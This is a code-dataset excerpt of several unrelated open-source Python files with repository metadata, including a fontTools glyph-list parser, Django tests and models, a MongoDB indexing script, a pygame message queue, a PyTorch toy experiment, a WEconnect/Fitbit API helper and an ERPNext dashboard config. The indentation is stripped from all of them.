0148;ncaron;LATIN SMALL LETTER N WITH CARON
0039;nine;DIGIT NINE
2209;notelement;NOT AN ELEMENT OF
2260;notequal;NOT EQUAL TO
2284;notsubset;NOT A SUBSET OF
00F1;ntilde;LATIN SMALL LETTER N WITH TILDE
03BD;nu;GREEK SMALL LETTER NU
0023;numbersign;NUMBER SIGN
006F;o;LATIN SMALL LETTER O
00F3;oacute;LATIN SMALL LETTER O WITH ACUTE
014F;obreve;LATIN SMALL LETTER O WITH BREVE
00F4;ocircumflex;LATIN SMALL LETTER O WITH CIRCUMFLEX
00F6;odieresis;LATIN SMALL LETTER O WITH DIAERESIS
0153;oe;LATIN SMALL LIGATURE OE
02DB;ogonek;OGONEK
00F2;ograve;LATIN SMALL LETTER O WITH GRAVE
01A1;ohorn;LATIN SMALL LETTER O WITH HORN
0151;ohungarumlaut;LATIN SMALL LETTER O WITH DOUBLE ACUTE
014D;omacron;LATIN SMALL LETTER O WITH MACRON
03C9;omega;GREEK SMALL LETTER OMEGA
03D6;omega1;GREEK PI SYMBOL
03CE;omegatonos;GREEK SMALL LETTER OMEGA WITH TONOS
03BF;omicron;GREEK SMALL LETTER OMICRON
03CC;omicrontonos;GREEK SMALL LETTER OMICRON WITH TONOS
0031;one;DIGIT ONE
2024;onedotenleader;ONE DOT LEADER
215B;oneeighth;VULGAR FRACTION ONE EIGHTH
00BD;onehalf;VULGAR FRACTION ONE HALF
00BC;onequarter;VULGAR FRACTION ONE QUARTER
2153;onethird;VULGAR FRACTION ONE THIRD
25E6;openbullet;WHITE BULLET
00AA;ordfeminine;FEMININE ORDINAL INDICATOR
00BA;ordmasculine;MASCULINE ORDINAL INDICATOR
221F;orthogonal;RIGHT ANGLE
00F8;oslash;LATIN SMALL LETTER O WITH STROKE
01FF;oslashacute;LATIN SMALL LETTER O WITH STROKE AND ACUTE
00F5;otilde;LATIN SMALL LETTER O WITH TILDE
0070;p;LATIN SMALL LETTER P
00B6;paragraph;PILCROW SIGN
0028;parenleft;LEFT PARENTHESIS
0029;parenright;RIGHT PARENTHESIS
2202;partialdiff;PARTIAL DIFFERENTIAL
0025;percent;PERCENT SIGN
002E;period;FULL STOP
00B7;periodcentered;MIDDLE DOT
22A5;perpendicular;UP TACK
2030;perthousand;PER MILLE SIGN
20A7;peseta;PESETA SIGN
03C6;phi;GREEK SMALL LETTER PHI
03D5;phi1;GREEK PHI SYMBOL
03C0;pi;GREEK SMALL LETTER PI
002B;plus;PLUS SIGN
00B1;plusminus;PLUS-MINUS SIGN
211E;prescription;PRESCRIPTION TAKE
220F;product;N-ARY PRODUCT
2282;propersubset;SUBSET OF
2283;propersuperset;SUPERSET OF
221D;proportional;PROPORTIONAL TO
03C8;psi;GREEK SMALL LETTER PSI
0071;q;LATIN SMALL LETTER Q
003F;question;QUESTION MARK
00BF;questiondown;INVERTED QUESTION MARK
0022;quotedbl;QUOTATION MARK
201E;quotedblbase;DOUBLE LOW-9 QUOTATION MARK
201C;quotedblleft;LEFT DOUBLE QUOTATION MARK
201D;quotedblright;RIGHT DOUBLE QUOTATION MARK
2018;quoteleft;LEFT SINGLE QUOTATION MARK
201B;quotereversed;SINGLE HIGH-REVERSED-9 QUOTATION MARK
2019;quoteright;RIGHT SINGLE QUOTATION MARK
201A;quotesinglbase;SINGLE LOW-9 QUOTATION MARK
0027;quotesingle;APOSTROPHE
0072;r;LATIN SMALL LETTER R
0155;racute;LATIN SMALL LETTER R WITH ACUTE
221A;radical;SQUARE ROOT
0159;rcaron;LATIN SMALL LETTER R WITH CARON
2286;reflexsubset;SUBSET OF OR EQUAL TO
2287;reflexsuperset;SUPERSET OF OR EQUAL TO
00AE;registered;REGISTERED SIGN
2310;revlogicalnot;REVERSED NOT SIGN
03C1;rho;GREEK SMALL LETTER RHO
02DA;ring;RING ABOVE
2590;rtblock;RIGHT HALF BLOCK
0073;s;LATIN SMALL LETTER S
015B;sacute;LATIN SMALL LETTER S WITH ACUTE
0161;scaron;LATIN SMALL LETTER S WITH CARON
015F;scedilla;LATIN SMALL LETTER S WITH CEDILLA
015D;scircumflex;LATIN SMALL LETTER S WITH CIRCUMFLEX
2033;second;DOUBLE PRIME
00A7;section;SECTION SIGN
003B;semicolon;SEMICOLON
0037;seven;DIGIT SEVEN
215E;seveneighths;VULGAR FRACTION SEVEN EIGHTHS
2592;shade;MEDIUM SHADE
03C3;sigma;GREEK SMALL LETTER SIGMA
03C2;sigma1;GREEK SMALL LETTER FINAL SIGMA
223C;similar;TILDE OPERATOR
0036;six;DIGIT SIX
002F;slash;SOLIDUS
263A;smileface;WHITE SMILING FACE
0020;space;SPACE
2660;spade;BLACK SPADE SUIT
00A3;sterling;POUND SIGN
220B;suchthat;CONTAINS AS MEMBER
2211;summation;N-ARY SUMMATION
263C;sun;WHITE SUN WITH RAYS
0074;t;LATIN SMALL LETTER T
03C4;tau;GREEK SMALL LETTER TAU
0167;tbar;LATIN SMALL LETTER T WITH STROKE
0165;tcaron;LATIN SMALL LETTER T WITH CARON
2234;therefore;THEREFORE
03B8;theta;GREEK SMALL LETTER THETA
03D1;theta1;GREEK THETA SYMBOL
00FE;thorn;LATIN SMALL LETTER THORN
0033;three;DIGIT THREE
215C;threeeighths;VULGAR FRACTION THREE EIGHTHS
00BE;threequarters;VULGAR FRACTION THREE QUARTERS
02DC;tilde;SMALL TILDE
0303;tildecomb;COMBINING TILDE
0384;tonos;GREEK TONOS
2122;trademark;TRADE MARK SIGN
25BC;triagdn;BLACK DOWN-POINTING TRIANGLE
25C4;triaglf;BLACK LEFT-POINTING POINTER
25BA;triagrt;BLACK RIGHT-POINTING POINTER
25B2;triagup;BLACK UP-POINTING TRIANGLE
0032;two;DIGIT TWO
2025;twodotenleader;TWO DOT LEADER
2154;twothirds;VULGAR FRACTION TWO THIRDS
0075;u;LATIN SMALL LETTER U
00FA;uacute;LATIN SMALL LETTER U WITH ACUTE
016D;ubreve;LATIN SMALL LETTER U WITH BREVE
00FB;ucircumflex;LATIN SMALL LETTER U WITH CIRCUMFLEX
00FC;udieresis;LATIN SMALL LETTER U WITH DIAERESIS
00F9;ugrave;LATIN SMALL LETTER U WITH GRAVE
01B0;uhorn;LATIN SMALL LETTER U WITH HORN
0171;uhungarumlaut;LATIN SMALL LETTER U WITH DOUBLE ACUTE
016B;umacron;LATIN SMALL LETTER U WITH MACRON
005F;underscore;LOW LINE
2017;underscoredbl;DOUBLE LOW LINE
222A;union;UNION
2200;universal;FOR ALL
0173;uogonek;LATIN SMALL LETTER U WITH OGONEK
2580;upblock;UPPER HALF BLOCK
03C5;upsilon;GREEK SMALL LETTER UPSILON
03CB;upsilondieresis;GREEK SMALL LETTER UPSILON WITH DIALYTIKA
03B0;upsilondieresistonos;GREEK SMALL LETTER UPSILON WITH DIALYTIKA AND TONOS
03CD;upsilontonos;GREEK SMALL LETTER UPSILON WITH TONOS
016F;uring;LATIN SMALL LETTER U WITH RING ABOVE
0169;utilde;LATIN SMALL LETTER U WITH TILDE
0076;v;LATIN SMALL LETTER V
0077;w;LATIN SMALL LETTER W
1E83;wacute;LATIN SMALL LETTER W WITH ACUTE
0175;wcircumflex;LATIN SMALL LETTER W WITH CIRCUMFLEX
1E85;wdieresis;LATIN SMALL LETTER W WITH DIAERESIS
2118;weierstrass;SCRIPT CAPITAL P
1E81;wgrave;LATIN SMALL LETTER W WITH GRAVE
0078;x;LATIN SMALL LETTER X
03BE;xi;GREEK SMALL LETTER XI
0079;y;LATIN SMALL LETTER Y
00FD;yacute;LATIN SMALL LETTER Y WITH ACUTE
0177;ycircumflex;LATIN SMALL LETTER Y WITH CIRCUMFLEX
00FF;ydieresis;LATIN SMALL LETTER Y WITH DIAERESIS
00A5;yen;YEN SIGN
1EF3;ygrave;LATIN SMALL LETTER Y WITH GRAVE
007A;z;LATIN SMALL LETTER Z
017A;zacute;LATIN SMALL LETTER Z WITH ACUTE
017E;zcaron;LATIN SMALL LETTER Z WITH CARON
017C;zdotaccent;LATIN SMALL LETTER Z WITH DOT ABOVE
0030;zero;DIGIT ZERO
03B6;zeta;GREEK SMALL LETTER ZETA
# END
"""
class AGLError(Exception):
pass
LEGACY_AGL2UV = {}
AGL2UV = {}
UV2AGL = {}
def _builddicts():
import re
lines = _aglText.splitlines()
parseAGL_RE = re.compile("([A-Za-z0-9]+);((?:[0-9A-F]{4})(?: (?:[0-9A-F]{4}))*)$")
for line in lines:
if not line or line[:1] == '#':
continue
m = parseAGL_RE.match(line)
if not m:
raise AGLError("syntax error in glyphlist.txt: %s" % repr(line[:20]))
unicodes = m.group(2)
assert len(unicodes) % 5 == 4
unicodes = [int(unicode, 16) for unicode in unicodes.split()]
glyphName = tostr(m.group(1))
LEGACY_AGL2UV[glyphName] = unicodes
lines = _aglfnText.splitlines()
parseAGLFN_RE = re.compile("([0-9A-F]{4});([A-Za-z0-9]+);.*?$")
for line in lines:
if not line or line[:1] == '#':
continue
m = parseAGLFN_RE.match(line)
if not m:
raise AGLError("syntax error in aglfn.txt: %s" % repr(line[:20]))
unicode = m.group(1)
assert len(unicode) == 4
unicode = int(unicode, 16)
glyphName = tostr(m.group(2))
AGL2UV[glyphName] = unicode
UV2AGL[unicode] = glyphName
_builddicts()
def toUnicode(glyph, isZapfDingbats=False):
"""Convert glyph names to Unicode, such as ``'longs_t.oldstyle'`` --> ``u'ſt'``
If ``isZapfDingbats`` is ``True``, the implementation recognizes additional
glyph names (as required by the AGL specification).
"""
# https://github.com/adobe-type-tools/agl-specification#2-the-mapping
#
# 1. Drop all the characters from the glyph name starting with
# the first occurrence of a period (U+002E; FULL STOP), if any.
glyph = glyph.split(".", 1)[0]
# 2. Split the remaining string into a sequence of components,
# using underscore (U+005F; LOW LINE) as the delimiter.
components = glyph.split("_")
# 3. Map each component to a character string according to the
# procedure below, and concatenate those strings; the result
# is the character string to which the glyph name is mapped.
result = [_glyphComponentToUnicode(c, isZapfDingbats)
for c in components]
return "".join(result)
def _glyphComponentToUnicode(component, isZapfDingbats):
# If the font is Zapf Dingbats (PostScript FontName: ZapfDingbats),
# and the component is in the ITC Zapf Dingbats Glyph List, then
# map it to the corresponding character in that list.
dingbat = _zapfDingbatsToUnicode(component) if isZapfDingbats else None
if dingbat:
return dingbat
# Otherwise, if the component is in AGL, then map it
# to the corresponding character in that list.
uchars = LEGACY_AGL2UV.get(component)
if uchars:
return "".join(map(chr, uchars))
# Otherwise, if the component is of the form "uni" (U+0075,
# U+006E, and U+0069) followed by a sequence of uppercase
# hexadecimal digits (0–9 and A–F, meaning U+0030 through
# U+0039 and U+0041 through U+0046), if the length of that
# sequence is a multiple of four, and if each group of four
# digits represents a value in the ranges 0000 through D7FF
# or E000 through FFFF, then interpret each as a Unicode scalar
# value and map the component to the string made of those
# scalar values. Note that the range and digit-length
# restrictions mean that the "uni" glyph name prefix can be
# used only with UVs in the Basic Multilingual Plane (BMP).
uni = _uniToUnicode(component)
if uni:
return uni
# Otherwise, if the component is of the form "u" (U+0075)
# followed by a sequence of four to six uppercase hexadecimal
# digits (0–9 and A–F, meaning U+0030 through U+0039 and
# U+0041 through U+0046), and those digits represents a value
# in the ranges 0000 through D7FF or E000 through 10FFFF, then
# interpret it as a Unicode scalar value and map the component
# to the string made of this scalar value.
uni = _uToUnicode(component)
if uni:
return uni
# Otherwise, map the component to an empty string.
return ''
# https://github.com/adobe-type-tools/agl-aglfn/blob/master/zapfdingbats.txt
_AGL_ZAPF_DINGBATS = (
" ✁✂✄☎✆✝✞✟✠✡☛☞✌✍✎✏✑✒✓✔✕✖✗✘✙✚✛✜✢✣✤✥✦✧★✩✪✫✬✭✮✯✰✱✲✳✴✵✶✷✸✹✺✻✼✽✾✿❀"
"❁❂❃❄❅❆❇❈❉❊❋●❍■❏❑▲▼◆❖ ◗❘❙❚❯❱❲❳❨❩❬❭❪❫❴❵❛❜❝❞❡❢❣❤✐❥❦❧♠♥♦♣ ✉✈✇"
"①②③④⑤⑥⑦⑧⑨⑩❶❷❸❹❺❻❼❽❾❿➀➁➂➃➄➅➆➇➈➉➊➋➌➍➎➏➐➑➒➓➔→➣↔"
"↕➙➛➜➝➞➟➠➡➢➤➥➦➧➨➩➫➭➯➲➳➵➸➺➻➼➽➾➚➪➶➹➘➴➷➬➮➱✃❐❒❮❰")
def _zapfDingbatsToUnicode(glyph):
"""Helper for toUnicode()."""
if len(glyph) < 2 or glyph[0] != 'a':
return None
try:
gid = int(glyph[1:])
except ValueError:
return None
if gid < 0 or gid >= len(_AGL_ZAPF_DINGBATS):
return None
uchar = _AGL_ZAPF_DINGBATS[gid]
return uchar if uchar != ' ' else None
_re_uni = re.compile("^uni([0-9A-F]+)$")
def _uniToUnicode(component):
"""Helper for toUnicode() to handle "uniABCD" components."""
match = _re_uni.match(component)
if match is None:
return None
digits = match.group(1)
if len(digits) % 4 != 0:
return None
chars = [int(digits[i : i + 4], 16)
for i in range(0, len(digits), 4)]
if any(c >= 0xD800 and c <= 0xDFFF for c in chars):
# The AGL specification explicitly excluded surrogate pairs.
return None
return ''.join([chr(c) for c in chars])
_re_u = re.compile("^u([0-9A-F]{4,6})$")
def _uToUnicode(component):
"""Helper for toUnicode() to handle "u1ABCD" components."""
match = _re_u.match(component)
if match is None:
return None
digits = match.group(1)
try:
value = int(digits, 16)
except ValueError:
return None
if ((value >= 0x0000 and value <= 0xD7FF) or
(value >= 0xE000 and value <= 0x10FFFF)):
return chr(value)
return None
|
google/material-design-icons
|
update/venv/lib/python3.9/site-packages/fontTools/agl.py
|
Python
|
apache-2.0
| 112,519
|
from django.test import TestCase
from groups import models as group_model
class SimpleTest(TestCase):
def test_create_group(self):
"""
Test group creation
"""
group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1)
self.assertTrue('address' in group)
self.assertTrue('description' in group)
self.assertTrue('members' in group)
self.assertTrue('sequence' in group)
group_copy = group_model.get_group(group['uri'])
self.assertEqual(group, group_copy)
def test_add_group_member(self):
group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1)
group_model.add_group_member(group['uri'], 'bob@mail.com')
group = group_model.get_group(group['uri'])
self.assertEqual(len(group['members']), 1)
self.assertEqual(group['members'][0], 'bob@mail.com')
def test_remove_group_member(self):
group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1)
group_model.add_group_member(group['uri'], 'bob@mail.com')
group_model.add_group_member(group['uri'], 'dick@mail.com')
group_model.remove_group_member(group['uri'], 'dick@mail.com')
group = group_model.get_group(group['uri'])
self.assertEqual(len(group['members']), 1)
self.assertEqual(group['members'][0], 'bob@mail.com')
def test_get_sequence_groups(self):
group = group_model.create_group('group-1-1@mechmooc.com', 'The A team', 1)
group = group_model.create_group('group-1-2@mechmooc.com', 'The B team', 1)
group = group_model.create_group('group-1-3@mechmooc.com', 'The C team', 1)
group = group_model.create_group('group-1-4@mechmooc.com', 'The D team', 1)
group = group_model.create_group('group-1-5@mechmooc.com', 'The E team', 1)
group = group_model.create_group('group-2-1@mechmooc.com', 'The A team', 2)
group = group_model.create_group('group-2-2@mechmooc.com', 'The B team', 2)
group = group_model.create_group('group-2-3@mechmooc.com', 'The C team', 2)
s_1_groups = group_model.get_groups('1')
self.assertIn('group-1-1@mechmooc.com', [group['address'] for group in s_1_groups])
def test_get_member_groups(self):
group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1)
group_model.add_group_member(group['uri'], 'bob@mail.com')
group = group_model.get_group(group['uri'])
groups = group_model.get_member_groups('bob@mail.com')
self.assertEqual(len(groups), 1)
self.assertEqual(groups[0], group)
|
p2pu/mechanical-mooc
|
groups/tests.py
|
Python
|
mit
| 2,657
|
#!vpy/bin/python
import pymongo
import sys
prod_config='/opt/slick/prodserver.cfg'
config = {}
with open(prod_config) as f:
for line in f:
if line.startswith("MONGODB_HOSTNAME"):
config['MONGODB_HOSTNAME'] = line.split('=')[1].strip().strip('"')
if line.startswith("MONGODB_DBNAME"):
config['MONGODB_DBNAME'] = line.split('=')[1].strip().strip('"')
if line.startswith("MONGODB_USERNAME"):
config['MONGODB_USERNAME'] = line.split('=')[1].strip().strip('"')
if line.startswith("MONGODB_PASSWORD"):
config['MONGODB_PASSWORD'] = line.split('=')[1].strip().strip('"')
if line.startswith("MONGODB_AUTHDB"):
config['MONGODB_AUTHDB'] = line.split('=')[1].strip().strip('"')
connect_options = {
"host": config['MONGODB_HOSTNAME'],
}
if 'MONGODB_USERNAME' in config:
connect_options['username'] = config['MONGODB_USERNAME']
if 'MONGODB_PASSWORD' in config:
connect_options['password'] = config['MONGODB_PASSWORD']
if 'MONGODB_AUTHDB' in config:
connect_options['authSource'] = config['MONGODB_AUTHDB']
client = pymongo.MongoClient(**connect_options)
db = client[config['MONGODB_DBNAME']]
sys.stdout.write("Creating index on projects...")
sys.stdout.flush()
db.projects.create_index([("name", pymongo.ASCENDING)])
sys.stdout.write("Done.\n")
sys.stdout.flush()
sys.stdout.write("Creating indexes on configurations...")
sys.stdout.flush()
db.configurations.create_index([("name", pymongo.ASCENDING)])
db.configurations.create_index([("configurationType", pymongo.ASCENDING)])
db.configurations.create_index([("filename", pymongo.ASCENDING)])
sys.stdout.write("Done.\n")
sys.stdout.flush()
sys.stdout.write("Creating indexes on testcases...")
sys.stdout.flush()
db.testcases.create_index([("automationId", pymongo.ASCENDING)])
db.testcases.create_index([("automationKey", pymongo.ASCENDING)])
db.testcases.create_index([("project.id", pymongo.ASCENDING), ("component.id", pymongo.ASCENDING)])
db.testcases.create_index([("tags", pymongo.ASCENDING)])
sys.stdout.write("Done.\n")
sys.stdout.flush()
sys.stdout.write("Creating indexes on results (could take a while)...")
sys.stdout.flush()
db.results.create_index([("runstatus", pymongo.ASCENDING), ("hostname", pymongo.ASCENDING)])
db.results.create_index([("runstatus", pymongo.ASCENDING), ("testcase.automationTool", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
db.results.create_index([("testrun.testrunId", pymongo.ASCENDING), ("status", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
db.results.create_index([("build.buildId", pymongo.ASCENDING), ("status", pymongo.ASCENDING)])
db.results.create_index([("testcase.testcaseId", pymongo.ASCENDING), ("config.configId", pymongo.ASCENDING), ("release.releaseId", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
db.results.create_index([("testcase.testcaseId", pymongo.ASCENDING), ("config.configId", pymongo.ASCENDING), ("release.releaseId", pymongo.ASCENDING), ("testrun.testplanId", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
db.results.create_index([("testcase.testcaseId", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
sys.stdout.write("Done.\n")
sys.stdout.flush()
sys.stdout.write("Creating indexes on testruns...")
sys.stdout.flush()
db.testruns.create_index([("project.id", pymongo.ASCENDING), ("release.releaseId", pymongo.ASCENDING)])
db.testruns.create_index([("project.id", pymongo.ASCENDING), ("dateCreated", pymongo.DESCENDING)])
db.testruns.create_index([("build.buildId", pymongo.ASCENDING), ("dateCreated", pymongo.DESCENDING)])
sys.stdout.write("Done.\n")
sys.stdout.flush()
sys.stdout.write("Creating index on system-configurations...")
sys.stdout.flush()
db['system-configurations'].create_index([("configurationType", pymongo.ASCENDING), ("name", pymongo.ASCENDING)])
sys.stdout.write("Done.\n")
sys.stdout.flush()
sys.stdout.write("Creating indexes on fs.chunks...")
sys.stdout.flush()
db['fs.chunks'].create_index([("files_id", pymongo.ASCENDING), ("n", pymongo.ASCENDING)])
sys.stdout.write("Done.\n")
sys.stdout.flush()
print "Should be all done now."
|
slickqa/slickqaweb
|
add-indexes.py
|
Python
|
apache-2.0
| 4,149
|
#!/usr/bin/env python3
# implementation of queue messaging system
from collections import deque
import pygame
from wargame.message import Message
from wargame.events import MessageType
class MessageQueue:
def __init__(self):
self.queue = deque()
self.listener = None
def set_listener(self, listener):
# call this scene to handle events
self.listener = listener
def add_message(self, message):
# add this to the RIGHT of the queue
self.queue.append(message)
def add_priority_message(self, message):
# priority? Add to the LEFT
self.queue.appendleft(message)
def handle(self):
"""
Handle the next message
Return True to quit pygame
"""
# add all inputs as low priority
# returns True if we quit the game
if self.get_inputs():
return True
if self.empty:
return False
# take from the LEFT of the queue
message = self.queue.popleft()
# send to the scene
if self.listener is not None:
self.listener(message)
return False
def get_inputs(self):
# add all input events to the queue
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.add_message(Message(MessageType.EXIT_GAME, None))
else:
# timer or move?
if event.type >= pygame.USEREVENT:
self.add_message(Message(event.type, None))
else:
self.add_message(Message(event.type, event))
return False
def size(self):
return len(self.queue)
@property
def empty(self):
return len(self.queue) == 0
# singleton message system
MessageSystem = MessageQueue()
|
maximinus/wargame
|
wargame/wargame/scheduler.py
|
Python
|
gpl-3.0
| 1,834
|
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.utils.translation import ugettext_lazy as _
from openbudgets.commons.mixins import models as mixins
class InteractionManager(models.Manager):
"""Helpers for querying Interaction objects"""
def of_user(self, user):
"""Get this user's objects for this interaction"""
return self.get_query_set().filter(user=user)
class Interaction(mixins.TimeStampMixin, mixins.ClassMethodMixin):
"""An abstract class for user-object interactions"""
class Meta:
abstract = True
ordering = ['user', 'content_type', 'object_id']
unique_together = (('user', 'content_type', 'object_id'),)
objects = InteractionManager()
user = models.ForeignKey(
settings.AUTH_USER_MODEL,)
content_type = models.ForeignKey(
ContentType,
editable=False,)
object_id = models.PositiveIntegerField(
editable=False,)
content_object = generic.GenericForeignKey(
'content_type', 'object_id',)
def get_absolute_url(self):
return self.content_object.get_absolute_url()
def __unicode__(self):
return "{user} <> {obj}".format(user=self.user, obj=self.content_object)
class Star(Interaction):
"""Objects that are starred by users"""
class Meta:
verbose_name = _('star')
verbose_name_plural = _('stars')
class Follow(Interaction):
"""Objects that are followed by users"""
class Meta:
verbose_name = _('follow')
verbose_name_plural = _('follows')
class Share(Interaction):
"""TODO: Objects that are shared by users"""
class Meta:
verbose_name = _('share')
verbose_name_plural = _('shares')
|
openbudgets/openbudgets
|
openbudgets/apps/interactions/models.py
|
Python
|
bsd-3-clause
| 1,902
|
# We don't know enough about neural network.
# In ind_datagen.py, I will construct some extremely simplified neural network
# and data sets to explore the properties of NN.
#
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import TensorDataset, DataLoader
from torch.autograd import Variable
import torch.optim
import numpy as np
from amne.amnesia import AverageMeter
import time
import pickle
# Experiment 1
# Dimension filtering
class Filter(nn.Module):
def __init__(self):
super(Filter, self).__init__()
self.lin1=nn.Linear(100,100)
self.lin2=nn.Linear(100,100)
self.lin3=nn.Linear(100,1)
def forward(self,input):
x=self.lin1(input)
x=F.relu(x)
x=self.lin2(x)
x=F.relu(x)
x=self.lin3(x)
return x
def train(data_loader,model,criterion,optimizer,epoch):
end=time.time()
for i,(input,target) in enumerate(data_loader):
input=Variable(input.cuda())
target=Variable(target.cuda())
target=target.float()
output=model(input)
loss=criterion(output,target)
batch_loss.update(loss.data[0],input.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_time.update(time.time()-end)
end=time.time()
print_freq=10
if i%print_freq==0:
print("Epoch:[{0:4}][{1:3}/{2:3}]\t"
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(
epoch, i, len(data_loader), batch_time=batch_time,
loss=batch_loss))
if __name__=="__main__":
input=np.random.normal(size=(200000,100))
target=3*input[:,0]+7*input[:,1]
input=torch.Tensor(input)
target=torch.FloatTensor(target)
ds=TensorDataset(input,target)
dl=DataLoader(ds,batch_size=1024,shuffle=True)
model=Filter().cuda()
criterion = nn.SmoothL1Loss().cuda()
optimizer=torch.optim.Adam(model.parameters(),lr=0.001)
batch_time=AverageMeter()
batch_loss=AverageMeter()
epochs=200
model.train()
for epoch in range(epochs):
train(dl,model,criterion,optimizer,epoch)
pickle.dump(model.state_dict(),open("last_model_linear.pickle",'wb'))
|
Fuchai/Philosophy-Machine
|
analysis/ind_datagen.py
|
Python
|
apache-2.0
| 2,328
|
"""
Contains various helpers for use by the Flask application.\n
Created by Abigail Franz on 3/13/2018\.n
Last modified by Abigail Franz on 5/5/2018.
"""
import logging, sys
import json, requests
from datetime import datetime, timedelta, MAXYEAR
#from background import db
#from app.models import Activity
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
WC_URL = "https://palalinq.herokuapp.com/api/People"
WC_DATE_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"
TODAY = datetime(datetime.now().year, datetime.now().month, datetime.now().day)
def login_to_wc(email, password):
"""
Log user into WEconnect, produce an ID and access token that will last 90
days. Return False if the login was unsuccessful; otherwise, return the ID
and token in a tuple.
Assumptions: People already have a WeConnect account (email)
Outcome: all successful login requests return a id, and NEW access token
:param String email: the user's WEconnect username (email address)
:param String password: the user's WEconnect password
"""
url = "{}/login".format(WC_URL)
data = {"email": email, "password": password}
result = requests.post(url, data=data)
if result.status_code != 200:
return False, ()
jres = result.json()
wc_id = str(jres["accessToken"]["userId"])
wc_token = str(jres["accessToken"]["id"])
logging.debug("WC Login attempt returns: {}".format(wc_id))
if wc_id is None:
return False, ()
else:
return True, (wc_id, wc_token)
def check_wc_token_status(wc_user_id, wc_token):
logging.info("CHECKING STATUS")
"""
CHECK TOKEN STATUS (401 AUTH ERROR)
"""
url = "{}/{}?access_token={}".format(WC_URL, wc_user_id, wc_token)
result = requests.get(url)
logging.debug("Result: {}".format(result.status_code))
if result.status_code != 200:
print("Response: {}").format("Token invalid" if result.status_code == 401 else result.status_code)
return False
else:
print("Token for User {} is good").format(wc_user_id)
return True
def get_wc_activities(wc_id, wc_token):
"""
Pulls all of a user's activities from the WEconnect backend and parses
information about them to prepare for stores. Returns a list of activity dicts
:param a user's weconnect id, token
"""
url = "{}/{}/activities?access_token={}".format(WC_URL, wc_id,
wc_token)
response = requests.get(url)
if response.status_code != 200:
# Return an empty list if the request was unsuccessful
return []
parsed = response.json()
#TODO: EVERYTHING PAST HERE MODIFIED TO use WECONNECT.PY
# Data to use: user, activity
acts = []
for p in parsed:
act = wc_json_to_db(p)
acts.append(act)
'''
for item in parsed:
activity = wc_json_to_db(item, user)
if activity.expiration > datetime.now():
# Add the activity to the database if it's unexpired.
db.session.add(activity)
acts.append(activity)
db.session.commit()
'''
return acts
#def wc_json_to_db(wc_act, user):
def wc_json_to_db(wc_act):
"""
Given a JSON activity object from WEconnect, convert it to an activity dict
object compatible with the database.
:param dict wc_act: an activity from WEconnect in JSON format
return activity{ id, name, expiration, user=None}
"""
# Determine the start and end times
ts = datetime.strptime(wc_act["dateStart"], WC_DATE_FMT)
te = ts + timedelta(minutes=wc_act["duration"])
# Determine the expiration date (if any)
expiration = datetime(MAXYEAR, 12, 31)
if wc_act["repeat"] == "never":
expiration = te
if wc_act["repeatEnd"] != None:
expiration = datetime.strptime(wc_act["repeatEnd"], WC_DATE_FMT)
activity = {}
activity["id"] = wc_act["activityId"]
activity["name"] = wc_act["name"]
activity["expiration"] = expiration
activity["user"] = None
#activity = Activity(wc_act_id=wc_act["activityId"], name=wc_act["name"],
# expiration=expiration, user=user)
return activity
def complete_fb_login(fb_response):
"""
Extract the Fitbit access token from the response and return it, along with
the PowerToken username embedded in the URL string that was sent back from
Fitbit.
:param dict fb_response: the data returned from Fitbit (in JSON format)
"""
data_utf = fb_response.decode("utf-8")
data_json = json.loads(data_utf)
logging.debug(data_json)
return data_json["tok"], data_json["username"]
def fb_updateUserGoal(fbtoken):
BASE_URL = "https://api.fitbit.com/1/user/-"
url = "{}/activities/goals/daily.json".format(BASE_URL)
new_step_goal = 100000
params = {
"period" : "daily",
"type" : "steps",
"value" : new_step_goal
}
auth_headers = {"Authorization": "Bearer " + fb_token}
response = requests.post(url, headers=auth_headers, params=params)
if response.status_code == 200:
return response.json()["goals"]["steps"]
|
jazzij/powertoken
|
powertoken/api_util.py
|
Python
|
mit
| 4,691
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011, 2012 Carlos Jenkins <cjenkins@softwarelibrecr.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from .locales import *
|
carlos-jenkins/nested
|
nested/modules/locales/__init__.py
|
Python
|
gpl-2.0
| 822
|
from frappe import _
def get_data():
return {
'heatmap': True,
'heatmap_message': _('This is based on transactions against this Customer. See timeline below for details'),
'fieldname': 'customer',
'transactions': [
{
'label': _('Pre Sales'),
'items': ['Opportunity', 'Quotation']
},
{
'label': _('Orders'),
'items': ['Sales Order', 'Delivery Note', 'Sales Invoice']
},
{
'label': _('Support'),
'items': ['Issue']
},
{
'label': _('Projects'),
'items': ['Project']
},
{
'label': _('Pricing'),
'items': ['Pricing Rule']
},
{
'label': _('Subscriptions'),
'items': ['Subscription']
}
]
}
|
patilsangram/erpnext
|
erpnext/selling/doctype/customer/customer_dashboard.py
|
Python
|
gpl-3.0
| 679
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.